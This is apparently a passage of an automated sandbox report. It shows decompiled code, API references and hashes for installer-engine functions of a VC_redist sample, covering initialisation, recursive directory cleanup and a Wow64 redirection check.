                                                                          												} else {
                                                                          													_push("Failed to initialize core.");
                                                                          													L9:
                                                                          													E0005012F();
                                                                          													_t150 = _t167;
                                                                          													goto L39;
                                                                          												}
                                                                          											}
                                                                          											_t144 = GetLastError();
                                                                          											__eflags = _t144;
                                                                          											_t170 =  <=  ? _t144 : _t144 & 0x0000ffff | 0x80070000;
                                                                          											__eflags = _t170;
                                                                          											_t167 =  >=  ? 0x80004005 : _t170;
                                                                          											E000137D3(0x80004005, "engine.cpp", 0x95, _t167);
                                                                          											_push("Failed to get OS info.");
                                                                          											goto L9;
                                                                          										}
                                                                          										_push("Failed to initialize XML util.");
                                                                          										goto L9;
                                                                          									}
                                                                          									_push("Failed to initialize Wiutil.");
                                                                          									goto L9;
                                                                          								}
                                                                          								_push("Failed to initialize Regutil.");
                                                                          								goto L9;
                                                                          							}
                                                                          							_push("Failed to initialize Cryputil.");
                                                                          							goto L9;
                                                                          						}
                                                                          						_push("Failed to initialize COM.");
                                                                          						goto L2;
                                                                          					}
                                                                          					_push("Failed to initialize engine state.");
                                                                          					goto L2;
                                                                          				} else {
                                                                          					_push("Failed to parse command line.");
                                                                          					L2:
                                                                          					E0005012F();
                                                                          					_t150 = _t162;
                                                                          					_t159 = _t148;
                                                                          					L39:
                                                                          					if(_v296 != 0) {
                                                                          						E000554EF(_v296);
                                                                          					}
                                                                          					if(_t167 < 0 && _v576 == 0) {
                                                                          						E0005041B(_t150, _t156, _t159, 0, L"Setup", L"_Failed", L"txt", 0, 0, 0);
                                                                          					}
                                                                          					E0001D723( &_v1404);
                                                                          					E0002A6D0(_t150, _t156, _v1316); // executed
                                                                          					E0002A91E();
                                                                          					if(_t148 != 0) {
                                                                          						_t124 = _v1532;
                                                                          						if(_t124 != 0 && _t124 != 6) {
                                                                          							E0001550F(2, 0xa0000008, E0002416A(_t124));
                                                                          							_t173 = _t173 + 0xc;
                                                                          							_t167 = 0x80070bc2;
                                                                          							_t148 = 0;
                                                                          						}
                                                                          					}
                                                                          					E00014E9C(_t148, _t150, _t159,  &_v1588);
                                                                          					if(_v316 != 0) {
                                                                          						E00053911();
                                                                          					}
                                                                          					if(_v320 != 0) {
                                                                          						E00052DD0();
                                                                          					}
                                                                          					if(_v324 != 0) {
                                                                          						E00051317();
                                                                          					}
                                                                          					if(_v328 != 0) {
                                                                          						E0004FCBC();
                                                                          					}
                                                                          					if(_t159 != 0) {
                                                                          						__imp__CoUninitialize(); // executed
                                                                          					}
                                                                          					if(_v308 != 0) {
                                                                          						if(_t167 >= 0) {
                                                                          							_t159 =  *_v332;
                                                                          						} else {
                                                                          							_t159 = _t167;
                                                                          						}
                                                                          						_push(E00023C30(_t148));
                                                                          						E0001550F(2, 0x20000007, _t159);
                                                                          						if(_t148 != 0) {
                                                                          							_push(0xa0000005);
                                                                          							E0001550F();
                                                                          							_t150 = 2;
                                                                          						}
                                                                          					}
                                                                          					E0005000B(_t150, _t159, 0);
                                                                          					_t193 = _t148;
                                                                          					if(_t148 != 0) {
                                                                          						E000144E9(_t156);
                                                                          					}
                                                                          					E000506F5(_t150, _t159, _t193, 0);
                                                                          					return E0003DE36(_t148, _v8 ^ _t171, _t156, _t159, _t167);
                                                                          				}
                                                                          			}


                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 0001510F
                                                                            • Part of subcall function 000503F0: InitializeCriticalSection.KERNEL32(0007B60C,?,0001511B,00000000,?,?,?,?,?,?), ref: 00050407
                                                                            • Part of subcall function 00011209: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,00015137,00000000,?), ref: 00011247
                                                                            • Part of subcall function 00011209: GetLastError.KERNEL32(?,?,?,00015137,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00011251
                                                                          • CoInitializeEx.OLE32(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 0001517D
                                                                            • Part of subcall function 00050CD1: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00050CF2
                                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 0001520F
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00015219
                                                                          • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0001549B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                                          • String ID: 3.10.4.4718$@Met$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize user state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$Setup$_Failed$user.cpp$txt
                                                                          • API String ID: 3262001429-1227006524
                                                                          • Opcode ID: 3c4ec6ff5e20f80670d5d3ef9eb1ac02f49351219ce6031b33d4c9db391ee980
                                                                          • Instruction ID: cc0bfe75ce8175ee4193fc7dd97eb9a3606f6449d355bb99708d2ec219ff3723
                                                                          • Opcode Fuzzy Hash: 3c4ec6ff5e20f80670d5d3ef9eb1ac02f49351219ce6031b33d4c9db391ee980
                                                                          • Instruction Fuzzy Hash: 64B1A671D41A29EBDB32AB64CC46BEE76A8AF84313F040095FD09BB251D7719EC48E91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 75%
                                                                          			E00013BC3(void* __edx, WCHAR* _a4, unsigned int _a8) {
                                                                          				signed int _v8;
                                                                          				short _v528;
                                                                          				short _v1048;
                                                                          				short _v1078;
                                                                          				intOrPtr _v1592;
                                                                          				intOrPtr _v1594;
                                                                          				struct _WIN32_FIND_DATAW _v1640;
                                                                          				signed int _v1644;
                                                                          				signed int _v1648;
                                                                          				WCHAR* _v1652;
                                                                          				signed int _v1656;
                                                                          				signed int _v1660;
                                                                          				signed int _v1664;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t66;
                                                                          				signed char _t80;
                                                                          				void* _t81;
                                                                          				short _t87;
                                                                          				void* _t89;
                                                                          				short _t93;
                                                                          				signed char _t94;
                                                                          				int _t95;
                                                                          				signed short _t97;
                                                                          				int _t100;
                                                                          				int _t101;
                                                                          				signed short _t102;
                                                                          				signed short _t106;
                                                                          				int _t108;
                                                                          				signed short _t112;
                                                                          				short _t114;
                                                                          				signed short _t116;
                                                                          				signed short _t121;
                                                                          				signed short _t123;
                                                                          				long _t124;
                                                                          				WCHAR* _t125;
                                                                          				signed char _t126;
                                                                          				void* _t130;
                                                                          				void* _t132;
                                                                          				signed int _t160;
                                                                          
                                                                          				_t130 = __edx;
                                                                          				_t66 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t66 ^ _t160;
                                                                          				_v1648 = _v1648 | 0xffffffff;
                                                                          				_v1660 = _a8 & 0x00000001;
                                                                          				_t125 = _a4;
                                                                          				_v1656 = _a8 >> 0x00000001 & 0x00000001;
                                                                          				_v1652 = _t125;
                                                                          				_t133 = 0;
                                                                          				_v1664 = _a8 >> 0x00000002 & 0x00000001;
                                                                          				_v1644 = _v1644 & 0;
                                                                          				E0003F670(0x208,  &_v1048, 0, 0x208);
                                                                          				E0003F670(0x208,  &_v528, 0, 0x208);
                                                                          				_t80 = GetFileAttributesW(_t125); // executed
                                                                          				_t132 = GetLastError;
                                                                          				_t126 = _t80;
                                                                          				if(_t126 != 0xffffffff) {
                                                                          					L4:
                                                                          					if((_t126 & 0x00000010) == 0) {
                                                                          						_t133 = 0x8000ffff;
                                                                          						L54:
                                                                          						_t81 = _v1648;
                                                                          						if(_t81 != 0xffffffff) {
                                                                          							FindClose(_t81);
                                                                          						}
                                                                          						L56:
                                                                          						if(_v1644 != 0) {
                                                                          							E000554EF(_v1644);
                                                                          						}
                                                                          						return E0003DE36(_t126, _v8 ^ _t160, _t130, _t132, _t133);
                                                                          					}
                                                                          					if((_t126 & 0x00000001) == 0 || SetFileAttributesW(_v1652, 0x80) != 0) {
                                                                          						if(_v1660 != 0 || _v1656 != 0) {
                                                                          							_t126 = _v1664;
                                                                          							if(_t126 == 0 || GetTempPathW(0x104,  &_v1048) != 0) {
                                                                          								_t87 = E00012D79(_t127, _v1652, L"*.*",  &_v1644);
                                                                          								_t133 = _t87;
                                                                          								if(_t87 < 0) {
                                                                          									goto L56;
                                                                          								}
                                                                          								_t89 = FindFirstFileW(_v1644,  &_v1640); // executed
                                                                          								_v1648 = _t89;
                                                                          								if(_t89 != 0xffffffff) {
                                                                          									while(1) {
                                                                          										_t130 = 0x2e;
                                                                          										if(_t130 != _v1640.cFileName) {
                                                                          											goto L20;
                                                                          										}
                                                                          										_t127 = 0;
                                                                          										if(0 == _v1594 || _t130 == _v1594 && 0 == _v1592) {
                                                                          											L36:
                                                                          											_t127 =  &_v1640;
                                                                          											_t95 = FindNextFileW(_t89,  &_v1640); // executed
                                                                          											if(_t95 == 0) {
                                                                          												if(GetLastError() != 0x12) {
                                                                          													_t97 = GetLastError();
                                                                          													_t136 =  <=  ? _t97 : _t97 & 0x0000ffff | 0x80070000;
                                                                          													_t98 = 0x80004005;
                                                                          													_t133 =  >=  ? 0x80004005 :  <=  ? _t97 : _t97 & 0x0000ffff | 0x80070000;
                                                                          													_push( >=  ? 0x80004005 :  <=  ? _t97 : _t97 & 0x0000ffff | 0x80070000);
                                                                          													_push(0x132);
                                                                          													goto L39;
                                                                          												}
                                                                          												_t133 = 0;
                                                                          												goto L45;
                                                                          											}
                                                                          											_t89 = _v1648;
                                                                          											continue;
                                                                          										}
                                                                          										L20:
                                                                          										_v1078 = 0;
                                                                          										_t93 = E00012D79(_t127, _v1652,  &(_v1640.cFileName),  &_v1644);
                                                                          										_t133 = _t93;
                                                                          										if(_t93 < 0) {
                                                                          											goto L54;
                                                                          										}
                                                                          										_t94 = _v1640.dwFileAttributes;
                                                                          										if(_v1656 == 0 || (_t94 & 0x00000010) == 0) {
                                                                          											if(_v1660 == 0) {
                                                                          												goto L35;
                                                                          											}
                                                                          											if((_t94 & 0x00000007) == 0 || SetFileAttributesW(_v1644, 0x80) != 0) {
                                                                          												_t101 = DeleteFileW(_v1644); // executed
                                                                          												if(_t101 != 0) {
                                                                          													goto L35;
                                                                          												}
                                                                          												if(_t126 == 0) {
                                                                          													_t102 = GetLastError();
                                                                          													_t141 =  <=  ? _t102 : _t102 & 0x0000ffff | 0x80070000;
                                                                          													_t98 = 0x80004005;
                                                                          													_t133 =  >=  ? 0x80004005 :  <=  ? _t102 : _t102 & 0x0000ffff | 0x80070000;
                                                                          													_push( >=  ? 0x80004005 :  <=  ? _t102 : _t102 & 0x0000ffff | 0x80070000);
                                                                          													_push(0x125);
                                                                          													goto L39;
                                                                          												}
                                                                          												if(GetTempFileNameW( &_v1048, L"DEL", 0,  &_v528) == 0) {
                                                                          													_t106 = GetLastError();
                                                                          													_t144 =  <=  ? _t106 : _t106 & 0x0000ffff | 0x80070000;
                                                                          													_t98 = 0x80004005;
                                                                          													_t133 =  >=  ? 0x80004005 :  <=  ? _t106 : _t106 & 0x0000ffff | 0x80070000;
                                                                          													_push( >=  ? 0x80004005 :  <=  ? _t106 : _t106 & 0x0000ffff | 0x80070000);
                                                                          													_push(0x115);
                                                                          													goto L39;
                                                                          												}
                                                                          												_t108 = MoveFileExW(_v1644,  &_v528, 1);
                                                                          												_push(4);
                                                                          												_push(0);
                                                                          												if(_t108 == 0) {
                                                                          													_push(_v1644);
                                                                          												} else {
                                                                          													_push( &_v528);
                                                                          												}
                                                                          												MoveFileExW();
                                                                          												goto L35;
                                                                          											} else {
                                                                          												_t112 = GetLastError();
                                                                          												_t148 =  <=  ? _t112 : _t112 & 0x0000ffff | 0x80070000;
                                                                          												_t98 = 0x80004005;
                                                                          												_t133 =  >=  ? 0x80004005 :  <=  ? _t112 : _t112 & 0x0000ffff | 0x80070000;
                                                                          												_push( >=  ? 0x80004005 :  <=  ? _t112 : _t112 & 0x0000ffff | 0x80070000);
                                                                          												_push(0x10b);
                                                                          												goto L39;
                                                                          											}
                                                                          										} else {
                                                                          											_t114 = E00012B2E(_t127, _t132,  &_v1644);
                                                                          											_t133 = _t114;
                                                                          											if(_t114 < 0) {
                                                                          												goto L54;
                                                                          											}
                                                                          											E00013BC3(_t130, _v1644, _a8); // executed
                                                                          											L35:
                                                                          											_t89 = _v1648;
                                                                          											goto L36;
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          								_t116 = GetLastError();
                                                                          								_t151 =  <=  ? _t116 : _t116 & 0x0000ffff | 0x80070000;
                                                                          								_t117 = 0x80004005;
                                                                          								_t133 =  >=  ? 0x80004005 :  <=  ? _t116 : _t116 & 0x0000ffff | 0x80070000;
                                                                          								_push( >=  ? 0x80004005 :  <=  ? _t116 : _t116 & 0x0000ffff | 0x80070000);
                                                                          								_push(0xe7);
                                                                          							} else {
                                                                          								_t121 = GetLastError();
                                                                          								_t154 =  <=  ? _t121 : _t121 & 0x0000ffff | 0x80070000;
                                                                          								_t117 = 0x80004005;
                                                                          								_t133 =  >=  ? 0x80004005 :  <=  ? _t121 : _t121 & 0x0000ffff | 0x80070000;
                                                                          								_push( >=  ? 0x80004005 :  <=  ? _t121 : _t121 & 0x0000ffff | 0x80070000);
                                                                          								_push(0xdc);
                                                                          							}
                                                                          							goto L3;
                                                                          						} else {
                                                                          							_t126 = _v1664;
                                                                          							L45:
                                                                          							_t100 = RemoveDirectoryW(_v1652); // executed
                                                                          							if(_t100 != 0) {
                                                                          								goto L54;
                                                                          							}
                                                                          							_t133 =  <=  ? GetLastError() : _t98 & 0x0000ffff | 0x80070000;
                                                                          							if(_t133 != 0x80070020) {
                                                                          								L50:
                                                                          								if(_t133 >= 0) {
                                                                          									goto L54;
                                                                          								}
                                                                          								L51:
                                                                          								_push(_t133);
                                                                          								_push(0x141);
                                                                          								L39:
                                                                          								_push("dirutil.cpp");
                                                                          								E000137D3(_t98);
                                                                          								goto L54;
                                                                          							}
                                                                          							if(_t126 == 0 || MoveFileExW(_v1652, 0, 4) == 0) {
                                                                          								goto L51;
                                                                          							} else {
                                                                          								_t133 = 0;
                                                                          								goto L50;
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						_t123 = GetLastError();
                                                                          						_t157 =  <=  ? _t123 : _t123 & 0x0000ffff | 0x80070000;
                                                                          						_t117 = 0x80004005;
                                                                          						_t133 =  >=  ? 0x80004005 :  <=  ? _t123 : _t123 & 0x0000ffff | 0x80070000;
                                                                          						_push( >=  ? 0x80004005 :  <=  ? _t123 : _t123 & 0x0000ffff | 0x80070000);
                                                                          						_push(0xd1);
                                                                          						L3:
                                                                          						_push("dirutil.cpp");
                                                                          						E000137D3(_t117);
                                                                          						goto L56;
                                                                          					}
                                                                          				}
                                                                          				_t124 = GetLastError();
                                                                          				_t127 = 3;
                                                                          				_t117 =  ==  ? _t127 : _t124;
                                                                          				_t133 =  <=  ?  ==  ? _t127 : _t124 : ( ==  ? _t127 : _t124) & 0x0000ffff | 0x80070000;
                                                                          				if(_t133 >= 0) {
                                                                          					goto L4;
                                                                          				}
                                                                          				_push(_t133);
                                                                          				_push(0xc8);
                                                                          				goto L3;
                                                                          			}

                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00013C3F
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013C52
                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000001,00000000,?), ref: 00013C9D
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013CA7
                                                                          • GetTempPathW.KERNEL32(00000104,?,?,?,?,00000001,00000000,?), ref: 00013CF5
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013CFF
                                                                          • FindFirstFileW.KERNELBASE(?,?,?,*.*,?,?,?,?,00000001,00000000,?), ref: 00013D52
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013D63
                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000001,00000000,?), ref: 00013E3D
                                                                          • DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00000001,00000000,?), ref: 00013E51
                                                                          • GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000001,00000000,?), ref: 00013E78
                                                                          • MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000001,00000000,?), ref: 00013E9B
                                                                          • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00013EB4
                                                                          • FindNextFileW.KERNELBASE(000000FF,?,?,?,?,?,?,?,00000001,00000000,?), ref: 00013EC4
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013ED9
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013F08
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013F2A
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013F4C
                                                                          • RemoveDirectoryW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00013F63
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013F6D
                                                                          • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00013F93
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013FAE
                                                                          • FindClose.KERNEL32(000000FF,?,?,?,00000001,00000000,?), ref: 00013FE4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
                                                                          • String ID: *.*$DEL$dirutil.cpp
                                                                          • API String ID: 1544372074-1252831301
                                                                          • Opcode ID: 1a9ea5af342d6a422290ea1bf03723a876072c0892f13c37c35465484c7cfe4a
                                                                          • Instruction ID: fb9772bfbaba695c79361eb8dd4e531f0bf8dcf01419f157c3d5eeea40112a57
                                                                          • Opcode Fuzzy Hash: 1a9ea5af342d6a422290ea1bf03723a876072c0892f13c37c35465484c7cfe4a
                                                                          • Instruction Fuzzy Hash: 7EB1A872E00735AAEB715A758C45BEBB6E9EF44710F0102A5ED08F7190DB369ED1CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 62%
                                                                          			E00052F23(signed int _a4, intOrPtr* _a8, signed int _a12) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				char _v16;
                                                                          				_Unknown_base(*)()* _v20;
                                                                          				signed int _t38;
                                                                          				signed int _t46;
                                                                          				signed int _t53;
                                                                          				signed int _t58;
                                                                          				signed short _t61;
                                                                          				signed int _t64;
                                                                          				signed int _t65;
                                                                          				intOrPtr* _t66;
                                                                          				intOrPtr* _t67;
                                                                          				signed int _t68;
                                                                          				signed int _t69;
                                                                          				signed int _t71;
                                                                          				signed int _t74;
                                                                          				signed int _t79;
                                                                          				struct HINSTANCE__* _t81;
                                                                          				signed int _t82;
                                                                          
                                                                          				_t64 = 0;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_t81 = GetModuleHandleA("kernel32.dll");
                                                                          				if(_t81 != 0) {
                                                                          					_t38 = GetProcAddress(_t81, "IsWow64Process");
                                                                          					__eflags = _t38;
                                                                          					if(_t38 == 0) {
                                                                          						_t79 = 0;
                                                                          						L9:
                                                                          						__imp__CoCreateInstance(0x7b6c8, 0, 1, 0x5b808,  &_v8); // executed
                                                                          						_t82 = 0x7b6c8;
                                                                          						__eflags = 0x7b6c8;
                                                                          						if(0x7b6c8 < 0) {
                                                                          							L23:
                                                                          							__eflags = _t64;
                                                                          							if(_t64 == 0) {
                                                                          								L26:
                                                                          								L27:
                                                                          								_t66 = _v12;
                                                                          								if(_t66 != 0) {
                                                                          									 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                                          								}
                                                                          								_t67 = _v8;
                                                                          								if(_t67 != 0) {
                                                                          									 *((intOrPtr*)( *_t67 + 8))(_t67);
                                                                          								}
                                                                          								return _t82;
                                                                          							}
                                                                          							_t46 =  *_t79(_v16);
                                                                          							__eflags = _t46;
                                                                          							if(_t46 != 0) {
                                                                          								goto L26;
                                                                          							}
                                                                          							ExitProcess(1);
                                                                          						}
                                                                          						_t68 = 0;
                                                                          						__eflags = 0;
                                                                          						_t74 = 0x7b6c8;
                                                                          						while(1) {
                                                                          							__eflags =  *((intOrPtr*)(_t74 + _t68 * 4)) -  *((intOrPtr*)(0x5b7f8 + _t68 * 4));
                                                                          							_t74 = 0x7b6c8;
                                                                          							if(__eflags != 0) {
                                                                          								break;
                                                                          							}
                                                                          							_t68 = _t68 + 1;
                                                                          							__eflags = _t68 - 4;
                                                                          							if(_t68 != 4) {
                                                                          								continue;
                                                                          							}
                                                                          							L17:
                                                                          							 *0x7b6dc = 1;
                                                                          							L18:
                                                                          							__eflags = _a4;
                                                                          							if(_a4 == 0) {
                                                                          								L21:
                                                                          								_v8 = _v8 & 0x00000000;
                                                                          								 *_a8 = _v8;
                                                                          								_t71 = _a12;
                                                                          								__eflags = _t71;
                                                                          								if(_t71 != 0) {
                                                                          									_t29 =  &_v12;
                                                                          									 *_t29 = _v12 & 0x00000000;
                                                                          									__eflags =  *_t29;
                                                                          									 *_t71 = _v12;
                                                                          								}
                                                                          								goto L23;
                                                                          							}
                                                                          							_t82 = E000530BF( &_v12, _v8, _a4,  &_v12);
                                                                          							__eflags = _t82;
                                                                          							if(_t82 < 0) {
                                                                          								goto L23;
                                                                          							}
                                                                          							_t53 = _v8;
                                                                          							_t82 =  *((intOrPtr*)( *_t53 + 0x54))(_t53, _v12, 0);
                                                                          							__eflags = _t82;
                                                                          							if(_t82 < 0) {
                                                                          								goto L23;
                                                                          							}
                                                                          							goto L21;
                                                                          						}
                                                                          						_t69 = 0;
                                                                          						__eflags = 0;
                                                                          						while(1) {
                                                                          							__eflags =  *((intOrPtr*)(_t74 + _t69 * 4)) -  *((intOrPtr*)(0x5b7e8 + _t69 * 4));
                                                                          							_t74 = 0x7b6c8;
                                                                          							if(__eflags != 0) {
                                                                          								goto L18;
                                                                          							}
                                                                          							_t69 = _t69 + 1;
                                                                          							__eflags = _t69 - 4;
                                                                          							if(_t69 != 4) {
                                                                          								continue;
                                                                          							}
                                                                          							goto L17;
                                                                          						}
                                                                          						goto L18;
                                                                          					}
                                                                          					_v20 = GetProcAddress(_t81, "Wow64DisableWow64FsRedirection");
                                                                          					_t65 = GetProcAddress(_t81, "Wow64EnableWow64FsRedirection");
                                                                          					_t79 = GetProcAddress(_t81, "Wow64RevertWow64FsRedirection");
                                                                          					_t58 = _v20;
                                                                          					__eflags = _t58;
                                                                          					if(_t58 == 0) {
                                                                          						L7:
                                                                          						_t64 = 0;
                                                                          						goto L9;
                                                                          					}
                                                                          					__eflags = _t65;
                                                                          					if(_t65 == 0) {
                                                                          						goto L7;
                                                                          					}
                                                                          					__eflags = _t79;
                                                                          					if(_t79 == 0) {
                                                                          						goto L7;
                                                                          					}
                                                                          					 *_t58( &_v16);
                                                                          					_t64 =  *_t65(1) & 0x000000ff;
                                                                          					goto L9;
                                                                          				}
                                                                          				_t61 = GetLastError();
                                                                          				_t85 =  <=  ? _t61 : _t61 & 0x0000ffff | 0x80070000;
                                                                          				_t82 =  >=  ? 0x80004005 :  <=  ? _t61 : _t61 & 0x0000ffff | 0x80070000;
                                                                          				E000137D3(0x80004005, "xmlutil.cpp", 0x85, _t82);
                                                                          				goto L27;
                                                                          			}
























                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,000534DF,00000000,?,00000000), ref: 00052F3D
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0003BDED,?,000152FD,?,00000000,?), ref: 00052F49
                                                                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00052F89
                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00052F95
                                                                          • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 00052FA0
                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00052FAA
                                                                          • CoCreateInstance.OLE32(0007B6C8,00000000,00000001,0005B808,?,?,?,?,?,?,?,?,?,?,?,0003BDED), ref: 00052FE5
                                                                          • ExitProcess.KERNEL32 ref: 00053094
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                                          • String ID: @Met$IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                                          • API String ID: 2124981135-2758322954
                                                                          • Opcode ID: bc4be2b5c7693c9cb108f40836c1ac6328d5199f34a36422cc16c8cea9a75a83
                                                                          • Instruction ID: 8771835b2737b647e8bfd06b8f85e800fb74549d0b942a6d5f88822c03dcbbb3
                                                                          • Opcode Fuzzy Hash: bc4be2b5c7693c9cb108f40836c1ac6328d5199f34a36422cc16c8cea9a75a83
                                                                          • Instruction Fuzzy Hash: 0541A331E00315ABDB209FA8C854BAFB7E4EF44752F114069ED05EB291D779DE488BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00011070(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
                                                                          				signed int _v8;
                                                                          				char* _v12;
                                                                          				char* _v16;
                                                                          				char* _v20;
                                                                          				char* _v24;
                                                                          				char* _v28;
                                                                          				char* _v32;
                                                                          				char* _v36;
                                                                          				char* _v40;
                                                                          				char* _v44;
                                                                          				WCHAR* _v48;
                                                                          				char _v52;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t24;
                                                                          				void* _t29;
                                                                          				void* _t33;
                                                                          				void* _t35;
                                                                          				void* _t40;
                                                                          				intOrPtr _t41;
                                                                          				void* _t42;
                                                                          				void* _t45;
                                                                          				intOrPtr _t46;
                                                                          				void* _t47;
                                                                          				signed int _t48;
                                                                          				void* _t49;
                                                                          				signed int _t50;
                                                                          
                                                                          				_t45 = __edx;
                                                                          				_t42 = __ecx;
                                                                          				_t24 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t24 ^ _t50;
                                                                          				_t41 = _a4;
                                                                          				_t46 = _a12;
                                                                          				_t49 = _t48 | 0xffffffff;
                                                                          				_v52 = 0;
                                                                          				_v48 = 0;
                                                                          				_v44 = L"cabinet.dll";
                                                                          				_v40 = L"msi.dll";
                                                                          				_v36 = L"version.dll";
                                                                          				_v32 = L"wininet.dll";
                                                                          				_v28 = L"comres.dll";
                                                                          				_v24 = L"clbcatq.dll";
                                                                          				_v20 = L"msasn1.dll";
                                                                          				_v16 = L"crypt32.dll";
                                                                          				_v12 = L"feclient.dll";
                                                                          				if(E000133D7( &_v48, 0) >= 0) {
                                                                          					_t40 = CreateFileW(_v48, 0x80000000, 5, 0, 3, 0x80, 0); // executed
                                                                          					_t49 = _t40;
                                                                          				}
                                                                          				_t29 = E0001501B(_t46); // executed
                                                                          				_t52 = _t29;
                                                                          				if(_t29 == 0) {
